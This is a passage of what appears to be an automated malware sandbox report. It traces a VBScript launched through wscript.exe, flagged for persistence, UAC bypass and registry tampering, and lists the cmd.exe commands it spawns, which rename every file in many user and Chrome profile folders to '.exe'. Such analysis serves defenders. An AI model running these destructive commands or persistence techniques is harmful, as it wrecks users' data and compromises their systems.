      "C:\Program Files (x86)\Windows Media Player\wmpshare.exe"
      4⤵
      PID:2832

C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator
1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Drops startup file
- Modifies system executable filetype association
- Drops desktop.ini file(s)
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\*.*" "*.exe"
  2⤵
  PID:1584
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Application Data\*.*" "*.exe"
  2⤵
  PID:2492
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Contacts\*.*" "*.exe"
  2⤵
  PID:1908
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Cookies\*.*" "*.exe"
  2⤵
  PID:1916
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Desktop\*.*" "*.exe"
  2⤵
  PID:1896
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\*.*" "*.exe"
  2⤵
  PID:2112
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Downloads\*.*" "*.exe"
  2⤵
  PID:336
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\*.*" "*.exe"
  2⤵
  PID:2440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\My Documents\*.*" "*.exe"
  2⤵
  PID:2576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Application Data\*.*" "*.exe"
  2⤵
  PID:1236
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\*.*" "*.exe"
  2⤵
  PID:1700
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\*.*" "*.exe"
  2⤵
  PID:1884
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\*.*" "*.exe"
  2⤵
  PID:2788
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\*.*" "*.exe"
  2⤵
  PID:760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\*.*" "*.exe"
  2⤵
  PID:2888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Videos\*.*" "*.exe"
  2⤵
  PID:2896
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Templates\*.*" "*.exe"
  2⤵
  PID:1412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Start Menu\*.*" "*.exe"
  2⤵
  PID:1388
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\SendTo\*.*" "*.exe"
  2⤵
  PID:2760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Searches\*.*" "*.exe"
  2⤵
  PID:2040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Saved Games\*.*" "*.exe"
  2⤵
  PID:2244
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Recent\*.*" "*.exe"
  2⤵
  PID:1288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\PrintHood\*.*" "*.exe"
  2⤵
  PID:1724
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Pictures\*.*" "*.exe"
  2⤵
  PID:1732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\NetHood\*.*" "*.exe"
  2⤵
  PID:1828
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Music\*.*" "*.exe"
  2⤵
  PID:1032
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Local Settings\*.*" "*.exe"
  2⤵
  PID:2148
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Links\*.*" "*.exe"
  2⤵
  PID:1372
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\History\*.*" "*.exe"
  2⤵
  PID:2344
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\*.*" "*.exe"
  2⤵
  PID:2188
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft Help\*.*" "*.exe"
  2⤵
  PID:1524
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\*.*" "*.exe"
  2⤵
  PID:1648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\*.*" "*.exe"
  2⤵
  - Suspicious behavior: RenamesItself
  PID:2288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temporary Internet Files\*.*" "*.exe"
  2⤵
  PID:1048
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\*.*" "*.exe"
  2⤵
  PID:1664
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\*.*" "*.exe"
  2⤵
  PID:1400
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\*.*" "*.exe"
  2⤵
  PID:1788
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\*.*" "*.exe"
  2⤵
  PID:2588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\*.*" "*.exe"
  2⤵
  PID:1328
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\*.*" "*.exe"
  2⤵
  PID:1556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\*.*" "*.exe"
  2⤵
  PID:1512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates\*.*" "*.exe"
  2⤵
  PID:2464
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\*.*" "*.exe"
  2⤵
  PID:1248
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation\*.*" "*.exe"
  2⤵
  PID:1020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\*.*" "*.exe"
  2⤵
  PID:568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\*.*" "*.exe"
  2⤵
  PID:1764
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny\*.*" "*.exe"
  2⤵
  PID:1560
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\*.*" "*.exe"
  2⤵
  PID:1040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\*.*" "*.exe"
  2⤵
  PID:2008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies\*.*" "*.exe"
  2⤵
  PID:1616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\*.*" "*.exe"
  2⤵
  PID:2552
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\*.*" "*.exe"
  2⤵
  PID:2260
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\*.*" "*.exe"
  2⤵
  PID:1872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data\*.*" "*.exe"
  2⤵
  PID:2724
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload\*.*" "*.exe"
  2⤵
  PID:2748
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\*.*" "*.exe"
  2⤵
  PID:2944
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints\*.*" "*.exe"
  2⤵
  PID:2768
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials\*.*" "*.exe"
  2⤵
  PID:2752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata\*.*" "*.exe"
  2⤵
  PID:2840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl\*.*" "*.exe"
  2⤵
  PID:2824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\*.*" "*.exe"
  2⤵
  PID:2616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips\*.*" "*.exe"
  2⤵
  PID:2660
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\*.*" "*.exe"
  2⤵
  PID:1164
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\*.*" "*.exe"
  2⤵
  PID:1712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\*.*" "*.exe"
  2⤵
  PID:1760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\*.*" "*.exe"
  2⤵
  PID:1236
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\*.*" "*.exe"
  2⤵
  PID:1716
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\UrlParamClassifications\*.*" "*.exe"
  2⤵
  PID:1984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm\*.*" "*.exe"
  2⤵
  PID:1692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData\*.*" "*.exe"
  2⤵
  PID:2592
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\*.*" "*.exe"
  2⤵
  PID:1648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\*.*" "*.exe"
  2⤵
  PID:1824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\*.*" "*.exe"
  2⤵
  PID:2252
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\*.*" "*.exe"
  2⤵
  PID:3000
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\*.*" "*.exe"
  2⤵
  PID:2092
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" "*.exe"
  2⤵
  PID:1172
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\*.*" "*.exe"
  2⤵
  PID:1488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\*.*" "*.exe"
  2⤵
  PID:412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\*.*" "*.exe"
  2⤵
  PID:2380
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\*.*" "*.exe"
  2⤵
  PID:1696
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\*.*" "*.exe"
  2⤵
  PID:1820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\*.*" "*.exe"
  2⤵
  PID:624
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\*.*" "*.exe"
  2⤵
  PID:2560
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\*.*" "*.exe"
  2⤵
  PID:2072
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\*.*" "*.exe"
  2⤵
  PID:1680
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\*.*" "*.exe"
  2⤵
  PID:2368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*.*" "*.exe"
  2⤵
  PID:568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\*.*" "*.exe"
  2⤵
  PID:2004
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\*.*" "*.exe"
  2⤵
  PID:2204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\*.*" "*.exe"
  2⤵
  PID:1876
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\*.*" "*.exe"
  2⤵
  PID:1732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Search Logos\*.*" "*.exe"
  2⤵
  PID:296
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\*.*" "*.exe"
  2⤵
  PID:1624
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\*.*" "*.exe"
  2⤵
  PID:2568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\*.*" "*.exe"
  2⤵
  PID:2760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\*.*" "*.exe"
  2⤵
  PID:2724
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\*.*" "*.exe"
  2⤵
  PID:2864
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\*.*" "*.exe"
  2⤵
  PID:2832
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\*.*" "*.exe"
  2⤵
  PID:2984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\7398cab0-b6b5-4caa-a44e-55f20c45eba1\*.*" "*.exe"
  2⤵
  PID:2824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\*.*" "*.exe"
  2⤵
  PID:2704
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\*.*" "*.exe"
  2⤵
  PID:1164
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\*.*" "*.exe"
  2⤵
  PID:628
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\*.*" "*.exe"
  2⤵
  PID:1908
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\*.*" "*.exe"
  2⤵
  PID:1976
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\*.*" "*.exe"
  2⤵
  PID:2188
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\*.*" "*.exe"
  2⤵
  PID:2684
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\*.*" "*.exe"
  2⤵
  PID:1800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\*.*" "*.exe"
  2⤵
  PID:2676
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\*.*" "*.exe"
  2⤵
  PID:2564
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\*.*" "*.exe"
  2⤵
  PID:2080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\*.*" "*.exe"
  2⤵
  PID:2412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\*.*" "*.exe"
  2⤵
  PID:1488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\*.*" "*.exe"
  2⤵
  PID:1048
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\*.*" "*.exe"
  2⤵
  PID:872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"
  2⤵
  PID:2588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\*.*" "*.exe"
  2⤵
  PID:1052
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\*.*" "*.exe"
  2⤵
  PID:624
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\*.*" "*.exe"
  2⤵
  PID:1508
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\*.*" "*.exe"
  2⤵
  PID:2100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\*.*" "*.exe"
  2⤵
  PID:1064
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\*.*" "*.exe"
  2⤵
  PID:1028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\*.*" "*.exe"
  2⤵
  PID:1208
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\*.*" "*.exe"
  2⤵
  PID:2504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\*.*" "*.exe"
  2⤵
  PID:2432
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\*.*" "*.exe"
  2⤵
  PID:328
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\*.*" "*.exe"
  2⤵
  PID:2204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\*.*" "*.exe"
  2⤵
  PID:1728
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable\*.*" "*.exe"
  2⤵
  PID:2540
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome\*.*" "*.exe"
  2⤵
  PID:2552
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\*.*" "*.exe"
  2⤵
  PID:2568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable\*.*" "*.exe"
  2⤵
  PID:1872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome\*.*" "*.exe"
  2⤵
  PID:2184
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\*.*" "*.exe"
  2⤵
  PID:2732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable\*.*" "*.exe"
  2⤵
  PID:2908
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome\*.*" "*.exe"
  2⤵
  PID:2788
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\*.*" "*.exe"
  2⤵
  PID:2832
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable\*.*" "*.exe"
  2⤵
  PID:2824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome\*.*" "*.exe"
  2⤵
  PID:2792
- C:\Windows\System32\cmd.exe
